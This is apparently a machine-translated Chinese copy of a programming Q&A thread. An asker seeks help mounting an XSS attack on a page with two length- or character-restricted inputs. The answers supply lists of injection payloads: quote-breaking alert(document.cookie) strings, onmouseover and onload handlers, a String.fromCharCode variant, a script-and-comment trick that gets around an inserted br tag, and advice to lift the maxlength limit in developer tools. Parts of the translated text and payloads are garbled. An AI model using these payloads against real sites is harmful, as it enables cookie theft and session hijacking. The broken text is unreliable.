如何使用这些限制执行XSS攻击:



[input 1]< br /> [输入2] 
 输入1具有以下限制: - 仅10个字符 - 未清除


输入2具有以下限制: - “<” ,“>”,“&”已消毒 - 没有其他限制


此外,网页允许持久输入,但是一旦我打开标签,我就无法执行其他输入。
& #xA;
我试过这样做:



< script> &LT峰; br />警报(的document.cookie) &#的xD;
 但它似乎不起作用,大概是因为那里有br标签。
有关我应该如何进行的任何想法?

答案 0 :(得分:1)
你说:
输入1具有以下限制: - 仅10个字符 - 未清除
如果此输入的值刚刚反映在页面中(没有服务器端maxlength的控件),您可以使用浏览器的开发者工具来增加输入的maxlength值然后输入您想要的有效负载。
然后你说:
输入2具有以下限制: - “<” ,“>”,“&”消毒 - 没有其他限制
现在它取决于反映此输入值的位置:
如果输入参数值反映在Javascript中,您可以尝试:
";alert('XSS');//
");alert(document.cookie);
; window.open(www.google.com);
';alert(String.fromCharCode(88,83,83))//
如果输入参数值反映在HTML输入标记或其他HTML代码中,您可以尝试:
1? onmouseover=alert("xss"); "
"onload='confirm("test XSS")’
" onload=window.open(www.google.com)
" onload='javascript:alert(1)’
XSS取决于它的反映位置!你也必须使用你的大脑。
答案 1 :(得分:0)
例如:<script>/* <br/> */ alert(1); /*